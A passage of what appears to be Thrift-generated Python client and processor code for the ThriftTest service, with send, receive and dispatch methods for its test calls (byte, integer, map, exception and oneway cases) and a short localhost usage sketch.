(fname, mtype, rseqid) = iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(iprot)
iprot.readMessageEnd()
raise x
result = testByte_result()
result.read(iprot)
iprot.readMessageEnd()
if result.success is not None:
return result.success
raise TApplicationException(TApplicationException.MISSING_RESULT, "testByte failed: unknown result")
def testI32(self, thing):
"""
Prints 'testI32("%d")' with thing as '%d'
@param i32 thing - the i32 to print
@return i32 - returns the i32 'thing'
Parameters:
- thing
"""
self.send_testI32(thing)
return self.recv_testI32()
def send_testI32(self, thing):
self._oprot.writeMessageBegin('testI32', TMessageType.CALL, self._seqid)
args = testI32_args()
args.thing = thing
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_testI32(self):
iprot = self._iprot
(fname, mtype, rseqid) = iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(iprot)
iprot.readMessageEnd()
raise x
result = testI32_result()
result.read(iprot)
iprot.readMessageEnd()
if result.success is not None:
return result.success
raise TApplicationException(TApplicationException.MISSING_RESULT, "testI32 failed: unknown result")
def testI64(self, thing):
"""
Prints 'testI64("%d")' with thing as '%d'
@param i64 thing - the i64 to print
@return i64 - returns the i64 'thing'
Parameters:
- thing
"""
self.send_testI64(thing)
return self.recv_testI64()
def send_testI64(self, thing):
self._oprot.writeMessageBegin('testI64', TMessageType.CALL, self._seqid)
args = testI64_args()
args.thing = thing
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_testI64(self):
iprot = self._iprot
(fname, mtype, rseqid) = iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(iprot)
iprot.readMessageEnd()
raise x
result = testI64_result()
result.read(iprot)
iprot.readMessageEnd()
if result.success is not None:
return result.success
raise TApplicationException(TApplicationException.MISSING_RESULT, "testI64 failed: unknown result")
def testDouble(self, thing):
"""
Prints 'testDouble("%f")' with thing as '%f'
@param double thing - the double to print
@return double - returns the double 'thing'
Parameters:
- thing
"""
self.send_testDouble(thing)
return self.recv_testDouble()
def send_testDouble(self, thing):
self._oprot.writeMessageBegin('testDouble', TMessageType.CALL, self._seqid)
args = testDouble_args()
args.thing = thing
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_testDouble(self):
iprot = self._iprot
(fname, mtype, rseqid) = iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(iprot)
iprot.readMessageEnd()
raise x
result = testDouble_result()
result.read(iprot)
iprot.readMessageEnd()
if result.success is not None:
return result.success
raise TApplicationException(TApplicationException.MISSING_RESULT, "testDouble failed: unknown result")
def testBinary(self, thing):
"""
Prints 'testBinary("%s")' where '%s' is a hex-formatted string of thing's data
@param binary thing - the binary data to print
@return binary - returns the binary 'thing'
Parameters:
- thing
"""
self.send_testBinary(thing)
return self.recv_testBinary()
def send_testBinary(self, thing):
self._oprot.writeMessageBegin('testBinary', TMessageType.CALL, self._seqid)
args = testBinary_args()
args.thing = thing
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_testBinary(self):
iprot = self._iprot
(fname, mtype, rseqid) = iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(iprot)
iprot.readMessageEnd()
raise x
result = testBinary_result()
result.read(iprot)
iprot.readMessageEnd()
if result.success is not None:
return result.success
raise TApplicationException(TApplicationException.MISSING_RESULT, "testBinary failed: unknown result")
def testStruct(self, thing):
"""
Prints 'testStruct("{%s}")' where thing has been formatted into a string of comma separated values
@param Xtruct thing - the Xtruct to print
@return Xtruct - returns the Xtruct 'thing'
Parameters:
- thing
"""
self.send_testStruct(thing)
return self.recv_testStruct()
def send_testStruct(self, thing):
self._oprot.writeMessageBegin('testStruct', TMessageType.CALL, self._seqid)
args = testStruct_args()
args.thing = thing
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_testStruct(self):
iprot = self._iprot
(fname, mtype, rseqid) = iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(iprot)
iprot.readMessageEnd()
raise x
result = testStruct_result()
result.read(iprot)
iprot.readMessageEnd()
if result.success is not None:
return result.success
raise TApplicationException(TApplicationException.MISSING_RESULT, "testStruct failed: unknown result")
def testNest(self, thing):
"""
Prints 'testNest("{%s}")' where thing has been formatted into a string of the nested struct
@param Xtruct2 thing - the Xtruct2 to print
@return Xtruct2 - returns the Xtruct2 'thing'
Parameters:
- thing
"""
self.send_testNest(thing)
return self.recv_testNest()
def send_testNest(self, thing):
self._oprot.writeMessageBegin('testNest', TMessageType.CALL, self._seqid)
args = testNest_args()
args.thing = thing
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_testNest(self):
iprot = self._iprot
(fname, mtype, rseqid) = iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(iprot)
iprot.readMessageEnd()
raise x
result = testNest_result()
result.read(iprot)
iprot.readMessageEnd()
if result.success is not None:
return result.success
raise TApplicationException(TApplicationException.MISSING_RESULT, "testNest failed: unknown result")
def testMap(self, thing):
"""
Prints 'testMap("{%s}")' where thing has been formatted into a string of 'key => value' pairs
separated by commas and new lines
@param map<i32,i32> thing - the map<i32,i32> to print
@return map<i32,i32> - returns the map<i32,i32> 'thing'
Parameters:
- thing
"""
self.send_testMap(thing)
return self.recv_testMap()
def send_testMap(self, thing):
self._oprot.writeMessageBegin('testMap', TMessageType.CALL, self._seqid)
args = testMap_args()
args.thing = thing
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_testMap(self):
iprot = self._iprot
(fname, mtype, rseqid) = iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(iprot)
iprot.readMessageEnd()
raise x
result = testMap_result()
result.read(iprot)
iprot.readMessageEnd()
if result.success is not None:
return result.success
raise TApplicationException(TApplicationException.MISSING_RESULT, "testMap failed: unknown result")
def testStringMap(self, thing):
"""
Prints 'testStringMap("{%s}")' where thing has been formatted into a string of 'key => value' pairs
separated by commas and new lines
@param map<string,string> thing - the map<string,string> to print
@return map<string,string> - returns the map<string,string> 'thing'
Parameters:
- thing
"""
self.send_testStringMap(thing)
return self.recv_testStringMap()
def send_testStringMap(self, thing):
self._oprot.writeMessageBegin('testStringMap', TMessageType.CALL, self._seqid)
args = testStringMap_args()
args.thing = thing
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_testStringMap(self):
iprot = self._iprot
(fname, mtype, rseqid) = iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(iprot)
iprot.readMessageEnd()
raise x
result = testStringMap_result()
result.read(iprot)
iprot.readMessageEnd()
if result.success is not None:
return result.success
raise TApplicationException(TApplicationException.MISSING_RESULT, "testStringMap failed: unknown result")
def testSet(self, thing):
"""
Prints 'testSet("{%s}")' where thing has been formatted into a string of values
separated by commas and new lines
@param set<i32> thing - the set<i32> to print
@return set<i32> - returns the set<i32> 'thing'
Parameters:
- thing
"""
self.send_testSet(thing)
return self.recv_testSet()
def send_testSet(self, thing):
self._oprot.writeMessageBegin('testSet', TMessageType.CALL, self._seqid)
args = testSet_args()
args.thing = thing
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_testSet(self):
iprot = self._iprot
(fname, mtype, rseqid) = iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(iprot)
iprot.readMessageEnd()
raise x
result = testSet_result()
result.read(iprot)
iprot.readMessageEnd()
if result.success is not None:
return result.success
raise TApplicationException(TApplicationException.MISSING_RESULT, "testSet failed: unknown result")
def testList(self, thing):
"""
Prints 'testList("{%s}")' where thing has been formatted into a string of values
separated by commas and new lines
@param list<i32> thing - the list<i32> to print
@return list<i32> - returns the list<i32> 'thing'
Parameters:
- thing
"""
self.send_testList(thing)
return self.recv_testList()
def send_testList(self, thing):
self._oprot.writeMessageBegin('testList', TMessageType.CALL, self._seqid)
args = testList_args()
args.thing = thing
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_testList(self):
iprot = self._iprot
(fname, mtype, rseqid) = iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(iprot)
iprot.readMessageEnd()
raise x
result = testList_result()
result.read(iprot)
iprot.readMessageEnd()
if result.success is not None:
return result.success
raise TApplicationException(TApplicationException.MISSING_RESULT, "testList failed: unknown result")
def testEnum(self, thing):
"""
Prints 'testEnum("%d")' where thing has been formatted into its numeric value
@param Numberz thing - the Numberz to print
@return Numberz - returns the Numberz 'thing'
Parameters:
- thing
"""
self.send_testEnum(thing)
return self.recv_testEnum()
def send_testEnum(self, thing):
self._oprot.writeMessageBegin('testEnum', TMessageType.CALL, self._seqid)
args = testEnum_args()
args.thing = thing
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_testEnum(self):
iprot = self._iprot
(fname, mtype, rseqid) = iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(iprot)
iprot.readMessageEnd()
raise x
result = testEnum_result()
result.read(iprot)
iprot.readMessageEnd()
if result.success is not None:
return result.success
raise TApplicationException(TApplicationException.MISSING_RESULT, "testEnum failed: unknown result")
def testTypedef(self, thing):
"""
Prints 'testTypedef("%d")' with thing as '%d'
@param UserId thing - the UserId to print
@return UserId - returns the UserId 'thing'
Parameters:
- thing
"""
self.send_testTypedef(thing)
return self.recv_testTypedef()
def send_testTypedef(self, thing):
self._oprot.writeMessageBegin('testTypedef', TMessageType.CALL, self._seqid)
args = testTypedef_args()
args.thing = thing
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_testTypedef(self):
iprot = self._iprot
(fname, mtype, rseqid) = iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(iprot)
iprot.readMessageEnd()
raise x
result = testTypedef_result()
result.read(iprot)
iprot.readMessageEnd()
if result.success is not None:
return result.success
raise TApplicationException(TApplicationException.MISSING_RESULT, "testTypedef failed: unknown result")
def testMapMap(self, hello):
"""
Prints 'testMapMap("%d")' with hello as '%d'
@param i32 hello - the i32 to print
@return map<i32,map<i32,i32>> - returns a dictionary with these values:
{-4 => {-4 => -4, -3 => -3, -2 => -2, -1 => -1, }, 4 => {1 => 1, 2 => 2, 3 => 3, 4 => 4, }, }
Parameters:
- hello
"""
self.send_testMapMap(hello)
return self.recv_testMapMap()
def send_testMapMap(self, hello):
self._oprot.writeMessageBegin('testMapMap', TMessageType.CALL, self._seqid)
args = testMapMap_args()
args.hello = hello
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_testMapMap(self):
iprot = self._iprot
(fname, mtype, rseqid) = iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(iprot)
iprot.readMessageEnd()
raise x
result = testMapMap_result()
result.read(iprot)
iprot.readMessageEnd()
if result.success is not None:
return result.success
raise TApplicationException(TApplicationException.MISSING_RESULT, "testMapMap failed: unknown result")
def testInsanity(self, argument):
"""
So you think you've got this all worked out, eh?
Creates the returned map with these values and prints it out:
{ 1 => { 2 => argument,
3 => argument,
},
2 => { 6 => <empty Insanity struct>, },
}
@return map<UserId, map<Numberz,Insanity>> - a map with the above values
Parameters:
- argument
"""
self.send_testInsanity(argument)
return self.recv_testInsanity()
def send_testInsanity(self, argument):
self._oprot.writeMessageBegin('testInsanity', TMessageType.CALL, self._seqid)
args = testInsanity_args()
args.argument = argument
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_testInsanity(self):
iprot = self._iprot
(fname, mtype, rseqid) = iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(iprot)
iprot.readMessageEnd()
raise x
result = testInsanity_result()
result.read(iprot)
iprot.readMessageEnd()
if result.success is not None:
return result.success
raise TApplicationException(TApplicationException.MISSING_RESULT, "testInsanity failed: unknown result")
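# Illustrative shape of testInsanity's return value, per the docstring above
# (assuming the reference test server; the keys 2, 3 and 6 are the numeric
# values of the Numberz enum members TWO, THREE and SIX):
#
#   {1: {2: argument, 3: argument},
#    2: {6: Insanity()}}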
def testMulti(self, arg0, arg1, arg2, arg3, arg4, arg5):
"""
Prints 'testMulti()'
@param i8 arg0 -
@param i32 arg1 -
@param i64 arg2 -
@param map<i16, string> arg3 -
@param Numberz arg4 -
@param UserId arg5 -
@return Xtruct - returns an Xtruct with string_thing = "Hello2", byte_thing = arg0, i32_thing = arg1
and i64_thing = arg2
Parameters:
- arg0
- arg1
- arg2
- arg3
- arg4
- arg5
"""
self.send_testMulti(arg0, arg1, arg2, arg3, arg4, arg5)
return self.recv_testMulti()
def send_testMulti(self, arg0, arg1, arg2, arg3, arg4, arg5):
self._oprot.writeMessageBegin('testMulti', TMessageType.CALL, self._seqid)
args = testMulti_args()
args.arg0 = arg0
args.arg1 = arg1
args.arg2 = arg2
args.arg3 = arg3
args.arg4 = arg4
args.arg5 = arg5
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_testMulti(self):
iprot = self._iprot
(fname, mtype, rseqid) = iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(iprot)
iprot.readMessageEnd()
raise x
result = testMulti_result()
result.read(iprot)
iprot.readMessageEnd()
if result.success is not None:
return result.success
raise TApplicationException(TApplicationException.MISSING_RESULT, "testMulti failed: unknown result")
def testException(self, arg):
"""
Prints 'testException(%s)' with arg as '%s'
@param string arg - a string indicating what type of exception to throw
if arg == "Xception" throw Xception with errorCode = 1001 and message = arg
else if arg == "TException" throw TException
else do not throw anything
Parameters:
- arg
"""
self.send_testException(arg)
self.recv_testException()
def send_testException(self, arg):
self._oprot.writeMessageBegin('testException', TMessageType.CALL, self._seqid)
args = testException_args()
args.arg = arg
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_testException(self):
iprot = self._iprot
(fname, mtype, rseqid) = iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(iprot)
iprot.readMessageEnd()
raise x
result = testException_result()
result.read(iprot)
iprot.readMessageEnd()
if result.err1 is not None:
raise result.err1
return
def testMultiException(self, arg0, arg1):
"""
Prints 'testMultiException(%s, %s)' with arg0 as '%s' and arg1 as '%s'
@param string arg0 - a string indicating what type of exception to throw
if arg0 == "Xception" throw Xception with errorCode = 1001 and message = "This is an Xception"
else if arg0 == "Xception2" throw Xception2 with errorCode = 2002 and struct_thing.string_thing = "This is an Xception2"
else do not throw anything
@return Xtruct - an Xtruct with string_thing = arg1
Parameters:
- arg0
- arg1
"""
self.send_testMultiException(arg0, arg1)
return self.recv_testMultiException()
def send_testMultiException(self, arg0, arg1):
self._oprot.writeMessageBegin('testMultiException', TMessageType.CALL, self._seqid)
args = testMultiException_args()
args.arg0 = arg0
args.arg1 = arg1
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_testMultiException(self):
iprot = self._iprot
(fname, mtype, rseqid) = iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(iprot)
iprot.readMessageEnd()
raise x
result = testMultiException_result()
result.read(iprot)
iprot.readMessageEnd()
if result.success is not None:
return result.success
if result.err1 is not None:
raise result.err1
if result.err2 is not None:
raise result.err2
raise TApplicationException(TApplicationException.MISSING_RESULT, "testMultiException failed: unknown result")
def testOneway(self, secondsToSleep):
"""
Prints 'testOneway(%d): Sleeping...' with secondsToSleep as '%d'
sleeps for 'secondsToSleep' seconds
Prints 'testOneway(%d): done sleeping!' with secondsToSleep as '%d'
@param i32 secondsToSleep - the number of seconds to sleep
Parameters:
- secondsToSleep
"""
self.send_testOneway(secondsToSleep)
def send_testOneway(self, secondsToSleep):
self._oprot.writeMessageBegin('testOneway', TMessageType.ONEWAY, self._seqid)
args = testOneway_args()
args.secondsToSleep = secondsToSleep
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
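# A minimal usage sketch for the Client above (assumptions: a ThriftTest
# server is listening on localhost:9090, and the standard buffered
# transport / binary protocol stack is used; both are illustrative choices):
#
#   from thrift.transport import TSocket, TTransport
#   from thrift.protocol import TBinaryProtocol
#
#   transport = TTransport.TBufferedTransport(TSocket.TSocket('localhost', 9090))
#   protocol = TBinaryProtocol.TBinaryProtocol(transport)
#   client = Client(protocol)
#   transport.open()
#   print(client.testString('hello'))  # round-trips 'hello' through the server
#   client.testOneway(1)               # fire-and-forget: no recv_ call, returns immediately
#   transport.close()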
class Processor(Iface, TProcessor):
def __init__(self, handler):
self._handler = handler
self._processMap = {}
self._processMap["testVoid"] = Processor.process_testVoid
self._processMap["testString"] = Processor.process_testString
self._processMap["testBool"] = Processor.process_testBool
self._processMap["testByte"] = Processor.process_testByte
self._processMap["testI32"] = Processor.process_testI32
self._processMap["testI64"] = Processor.process_testI64
self._processMap["testDouble"] = Processor.process_testDouble
self._processMap["testBinary"] = Processor.process_testBinary
self._processMap["testStruct"] = Processor.process_testStruct
self._processMap["testNest"] = Processor.process_testNest
self._processMap["testMap"] = Processor.process_testMap
self._processMap["testStringMap"] = Processor.process_testStringMap
self._processMap["testSet"] = Processor.process_testSet
self._processMap["testList"] = Processor.process_testList
self._processMap["testEnum"] = Processor.process_testEnum
self._processMap["testTypedef"] = Processor.process_testTypedef
self._processMap["testMapMap"] = Processor.process_testMapMap
self._processMap["testInsanity"] = Processor.process_testInsanity
self._processMap["testMulti"] = Processor.process_testMulti
self._processMap["testException"] = Processor.process_testException
self._processMap["testMultiException"] = Processor.process_testMultiException
self._processMap["testOneway"] = Processor.process_testOneway
def process(self, iprot, oprot):
(name, type, seqid) = iprot.readMessageBegin()
if name not in self._processMap:
iprot.skip(TType.STRUCT)
iprot.readMessageEnd()
x = TApplicationException(TApplicationException.UNKNOWN_METHOD, 'Unknown function %s' % (name))
oprot.writeMessageBegin(name, TMessageType.EXCEPTION, seqid)
x.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
return
else:
self._processMap[name](self, seqid, iprot, oprot)
return True
def process_testVoid(self, seqid, iprot, oprot):
args = testVoid_args()
args.read(iprot)
iprot.readMessageEnd()
result = testVoid_result()
try:
self._handler.testVoid()
msg_type = TMessageType.REPLY
except TTransport.TTransportException:
raise
except TApplicationException as ex:
logging.exception('TApplication exception in handler')
msg_type = TMessageType.EXCEPTION
result = ex
except Exception:
logging.exception('Unexpected exception in handler')
msg_type = TMessageType.EXCEPTION
result = TApplicationException(TApplicationException.INTERNAL_ERROR, 'Internal error')
oprot.writeMessageBegin("testVoid", msg_type, seqid)
result.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
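# Every process_* method below follows this same template: decode the call's
# args struct, invoke the handler, map exceptions declared in the IDL to
# ordinary REPLY results, and wrap any unexpected exception in a
# TApplicationException before writing the response.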
def process_testString(self, seqid, iprot, oprot):
args = testString_args()
args.read(iprot)
iprot.readMessageEnd()
result = testString_result()
try:
result.success = self._handler.testString(args.thing)
msg_type = TMessageType.REPLY
except TTransport.TTransportException:
raise
except TApplicationException as ex:
logging.exception('TApplication exception in handler')
msg_type = TMessageType.EXCEPTION
result = ex
except Exception:
logging.exception('Unexpected exception in handler')
msg_type = TMessageType.EXCEPTION
result = TApplicationException(TApplicationException.INTERNAL_ERROR, 'Internal error')
oprot.writeMessageBegin("testString", msg_type, seqid)
result.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
def process_testBool(self, seqid, iprot, oprot):
args = testBool_args()
args.read(iprot)
iprot.readMessageEnd()
result = testBool_result()
try:
result.success = self._handler.testBool(args.thing)
msg_type = TMessageType.REPLY
except TTransport.TTransportException:
raise
except TApplicationException as ex:
logging.exception('TApplication exception in handler')
msg_type = TMessageType.EXCEPTION
result = ex
except Exception:
logging.exception('Unexpected exception in handler')
msg_type = TMessageType.EXCEPTION
result = TApplicationException(TApplicationException.INTERNAL_ERROR, 'Internal error')
oprot.writeMessageBegin("testBool", msg_type, seqid)
result.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
def process_testByte(self, seqid, iprot, oprot):
args = testByte_args()
args.read(iprot)
iprot.readMessageEnd()
result = testByte_result()
try:
result.success = self._handler.testByte(args.thing)
msg_type = TMessageType.REPLY
except TTransport.TTransportException:
raise
except TApplicationException as ex:
logging.exception('TApplication exception in handler')
msg_type = TMessageType.EXCEPTION
result = ex
except Exception:
logging.exception('Unexpected exception in handler')
msg_type = TMessageType.EXCEPTION
result = TApplicationException(TApplicationException.INTERNAL_ERROR, 'Internal error')
oprot.writeMessageBegin("testByte", msg_type, seqid)
result.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
def process_testI32(self, seqid, iprot, oprot):
args = testI32_args()
args.read(iprot)
iprot.readMessageEnd()
result = testI32_result()
try:
result.success = self._handler.testI32(args.thing)
msg_type = TMessageType.REPLY
except TTransport.TTransportException:
raise
except TApplicationException as ex:
logging.exception('TApplication exception in handler')
msg_type = TMessageType.EXCEPTION
result = ex
except Exception:
logging.exception('Unexpected exception in handler')
msg_type = TMessageType.EXCEPTION
result = TApplicationException(TApplicationException.INTERNAL_ERROR, 'Internal error')
oprot.writeMessageBegin("testI32", msg_type, seqid)
result.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
def process_testI64(self, seqid, iprot, oprot):
args = testI64_args()
args.read(iprot)
iprot.readMessageEnd()
result = testI64_result()
try:
result.success = self._handler.testI64(args.thing)
msg_type = TMessageType.REPLY
except TTransport.TTransportException:
raise
except TApplicationException as ex:
logging.exception('TApplication exception in handler')
msg_type = TMessageType.EXCEPTION
result = ex
except Exception:
logging.exception('Unexpected exception in handler')
msg_type = TMessageType.EXCEPTION
result = TApplicationException(TApplicationException.INTERNAL_ERROR, 'Internal error')
oprot.writeMessageBegin("testI64", msg_type, seqid)
result.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
def process_testDouble(self, seqid, iprot, oprot):
args = testDouble_args()
args.read(iprot)
iprot.readMessageEnd()
result = testDouble_result()
try:
result.success = self._handler.testDouble(args.thing)
msg_type = TMessageType.REPLY
except TTransport.TTransportException:
raise
except TApplicationException as ex:
logging.exception('TApplication exception in handler')
msg_type = TMessageType.EXCEPTION
result = ex
except Exception:
logging.exception('Unexpected exception in handler')
msg_type = TMessageType.EXCEPTION
result = TApplicationException(TApplicationException.INTERNAL_ERROR, 'Internal error')
oprot.writeMessageBegin("testDouble", msg_type, seqid)
result.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
def process_testBinary(self, seqid, iprot, oprot):
args = testBinary_args()
args.read(iprot)
iprot.readMessageEnd()
result = testBinary_result()
try:
result.success = self._handler.testBinary(args.thing)
msg_type = TMessageType.REPLY
except TTransport.TTransportException:
raise
except TApplicationException as ex:
logging.exception('TApplication exception in handler')
msg_type = TMessageType.EXCEPTION
result = ex
except Exception:
logging.exception('Unexpected exception in handler')
msg_type = TMessageType.EXCEPTION
result = TApplicationException(TApplicationException.INTERNAL_ERROR, 'Internal error')
oprot.writeMessageBegin("testBinary", msg_type, seqid)
result.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
def process_testStruct(self, seqid, iprot, oprot):
args = testStruct_args()
args.read(iprot)
iprot.readMessageEnd()
result = testStruct_result()
try:
result.success = self._handler.testStruct(args.thing)
msg_type = TMessageType.REPLY
except TTransport.TTransportException:
raise
except TApplicationException as ex:
logging.exception('TApplication exception in handler')
msg_type = TMessageType.EXCEPTION
result = ex
except Exception:
logging.exception('Unexpected exception in handler')
msg_type = TMessageType.EXCEPTION
result = TApplicationException(TApplicationException.INTERNAL_ERROR, 'Internal error')
oprot.writeMessageBegin("testStruct", msg_type, seqid)
result.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
def process_testNest(self, seqid, iprot, oprot):
args = testNest_args()
args.read(iprot)
iprot.readMessageEnd()
result = testNest_result()
try:
result.success = self._handler.testNest(args.thing)
msg_type = TMessageType.REPLY
except TTransport.TTransportException:
raise
except TApplicationException as ex:
logging.exception('TApplication exception in handler')
msg_type = TMessageType.EXCEPTION
result = ex
except Exception:
logging.exception('Unexpected exception in handler')
msg_type = TMessageType.EXCEPTION
result = TApplicationException(TApplicationException.INTERNAL_ERROR, 'Internal error')
oprot.writeMessageBegin("testNest", msg_type, seqid)
result.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
def process_testMap(self, seqid, iprot, oprot):
args = testMap_args()
args.read(iprot)
iprot.readMessageEnd()
result = testMap_result()
try:
result.success = self._handler.testMap(args.thing)
msg_type = TMessageType.REPLY
except TTransport.TTransportException:
raise
except TApplicationException as ex:
logging.exception('TApplication exception in handler')
msg_type = TMessageType.EXCEPTION
result = ex
except Exception:
logging.exception('Unexpected exception in handler')
msg_type = TMessageType.EXCEPTION
result = TApplicationException(TApplicationException.INTERNAL_ERROR, 'Internal error')
oprot.writeMessageBegin("testMap", msg_type, seqid)
result.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
def process_testStringMap(self, seqid, iprot, oprot):
args = testStringMap_args()
args.read(iprot)
iprot.readMessageEnd()
result = testStringMap_result()
try:
result.success = self._handler.testStringMap(args.thing)
msg_type = TMessageType.REPLY
except TTransport.TTransportException:
raise
except TApplicationException as ex:
logging.exception('TApplication exception in handler')
msg_type = TMessageType.EXCEPTION
result = ex
except Exception:
logging.exception('Unexpected exception in handler')
msg_type = TMessageType.EXCEPTION
result = TApplicationException(TApplicationException.INTERNAL_ERROR, 'Internal error')
oprot.writeMessageBegin("testStringMap", msg_type, seqid)
result.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
def process_testSet(self, seqid, iprot, oprot):
args = testSet_args()
args.read(iprot)
iprot.readMessageEnd()
result = testSet_result()
try:
result.success = self._handler.testSet(args.thing)
msg_type = TMessageType.REPLY
except TTransport.TTransportException:
raise
except TApplicationException as ex:
logging.exception('TApplication exception in handler')
msg_type = TMessageType.EXCEPTION
result = ex
except Exception:
logging.exception('Unexpected exception in handler')
msg_type = TMessageType.EXCEPTION
result = TApplicationException(TApplicationException.INTERNAL_ERROR, 'Internal error')
oprot.writeMessageBegin("testSet", msg_type, seqid)
result.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
def process_testList(self, seqid, iprot, oprot):
args = testList_args()
args.read(iprot)
iprot.readMessageEnd()
result = testList_result()
try:
result.success = self._handler.testList(args.thing)
msg_type = TMessageType.REPLY
except TTransport.TTransportException:
raise
except TApplicationException as ex:
logging.exception('TApplication exception in handler')
msg_type = TMessageType.EXCEPTION
result = ex
except Exception:
logging.exception('Unexpected exception in handler')
msg_type = TMessageType.EXCEPTION
result = TApplicationException(TApplicationException.INTERNAL_ERROR, 'Internal error')
oprot.writeMessageBegin("testList", msg_type, seqid)
result.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
def process_testEnum(self, seqid, iprot, oprot):
args = testEnum_args()
args.read(iprot)
iprot.readMessageEnd()
result = testEnum_result()
try:
result.success = self._handler.testEnum(args.thing)
msg_type = TMessageType.REPLY
except TTransport.TTransportException:
raise
except TApplicationException as ex:
logging.exception('TApplication exception in handler')
msg_type = TMessageType.EXCEPTION
result = ex
except Exception:
logging.exception('Unexpected exception in handler')
msg_type = TMessageType.EXCEPTION
result = TApplicationException(TApplicationException.INTERNAL_ERROR, 'Internal error')
oprot.writeMessageBegin("testEnum", msg_type, seqid)
result.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
def process_testTypedef(self, seqid, iprot, oprot):
args = testTypedef_args()
args.read(iprot)
iprot.readMessageEnd()
result = testTypedef_result()
try:
result.success = self._handler.testTypedef(args.thing)
msg_type = TMessageType.REPLY
except TTransport.TTransportException:
raise
except TApplicationException as ex:
logging.exception('TApplication exception in handler')
msg_type = TMessageType.EXCEPTION
result = ex
except Exception:
logging.exception('Unexpected exception in handler')
msg_type = TMessageType.EXCEPTION
result = TApplicationException(TApplicationException.INTERNAL_ERROR, 'Internal error')
oprot.writeMessageBegin("testTypedef", msg_type, seqid)
result.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
def process_testMapMap(self, seqid, iprot, oprot):
args = testMapMap_args()
args.read(iprot)
iprot.readMessageEnd()
result = testMapMap_result()
try:
result.success = self._handler.testMapMap(args.hello)
msg_type = TMessageType.REPLY
except TTransport.TTransportException:
raise
except TApplicationException as ex:
logging.exception('TApplication exception in handler')
msg_type = TMessageType.EXCEPTION
result = ex
except Exception:
logging.exception('Unexpected exception in handler')
msg_type = TMessageType.EXCEPTION
result = TApplicationException(TApplicationException.INTERNAL_ERROR, 'Internal error')
oprot.writeMessageBegin("testMapMap", msg_type, seqid)
result.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
def process_testInsanity(self, seqid, iprot, oprot):
args = testInsanity_args()
args.read(iprot)
iprot.readMessageEnd()
result = testInsanity_result()
try:
result.success = self._handler.testInsanity(args.argument)
msg_type = TMessageType.REPLY
except TTransport.TTransportException:
raise
except TApplicationException as ex:
logging.exception('TApplication exception in handler')
msg_type = TMessageType.EXCEPTION
result = ex
except Exception:
logging.exception('Unexpected exception in handler')
msg_type = TMessageType.EXCEPTION
result = TApplicationException(TApplicationException.INTERNAL_ERROR, 'Internal error')
oprot.writeMessageBegin("testInsanity", msg_type, seqid)
result.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
